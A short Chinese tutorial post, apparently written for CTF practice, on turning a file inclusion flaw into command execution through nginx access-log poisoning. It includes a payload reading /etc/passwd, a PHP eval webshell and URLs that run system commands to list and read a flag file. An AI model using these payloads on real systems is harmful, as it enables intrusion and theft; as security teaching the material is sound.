文件包含漏洞

和文件上传漏洞相关联的就是文件包含漏洞了,这是对于漏洞的进一步利用。这边是一些相对比较基础和常见的上传路径整理和方法,后面会继续更新。

对于文件包含漏洞,找到上传位置是一个比较重要的操作。

首先判断是否可以进行日志注入,判断的条件是是否可以进行ssrf漏洞。

传参/etc/passwd,如果成功,则代表可以进行日志注入

复制代码
?file=/etc/passwd

这里还要知道的是我们访问的网页文件一般默认存放在**/var/www/html**

默认nginx日志文件在/var/log/nginx/access.log

可以直接命令执行即可也可以用webshell后门工具连接

复制代码
<?php eval($_GET[2]);?>

可以直接命令执行即可也可以用webshell后门工具连接

?file=/var/log/nginx/access.log&2=system('ls /var/www/html');phpinfo();

?file=/var/log/nginx/access.log&2=system('tac /var/www/html/fl0g.php');phpinfo();
相关推荐
szxinmai主板定制专家6 小时前
一种基于 RK3568+AI 的国产化充电桩安全智能交互终端的设计与实现,终端支持各种复杂的交互功能和实时数据处理需求
arm开发·人工智能·嵌入式硬件·安全
深盾安全7 小时前
静态库 vs 动态库:开发必备,效率与性能的平衡术!
安全
EnCi Zheng8 小时前
Spring Security 最简配置完全指南-从入门到精通前后端分离安全配置
java·安全·spring
字节跳动安全中心8 小时前
MCP 安全“体检” | 基于 AI 驱动的 MCP 安全扫描系统
安全·llm·mcp
Li zlun10 小时前
MySQL 性能监控与安全管理完全指南
数据库·mysql·安全
YoungLime10 小时前
DVWA靶场之十:DOM 型 XSS(DOM Based Cross Site Scripting (XSS))
网络·安全·web安全
xiejava101814 小时前
开源安全管理平台wazuh-文件完整性监控FIM
安全·开源·wazuh
国科安芯15 小时前
ASP4644芯片低功耗设计思路解析
网络·单片机·嵌入式硬件·安全
Bruce_Liuxiaowei18 小时前
MQTT协议在物联网环境中的安全风险与防范指南
运维·网络·物联网·安全·网络安全
青衫客361 天前
基于 Python 构建的安全 gRPC 服务——TLS、mTLS 与 Casbin 授权实战
python·安全·微服务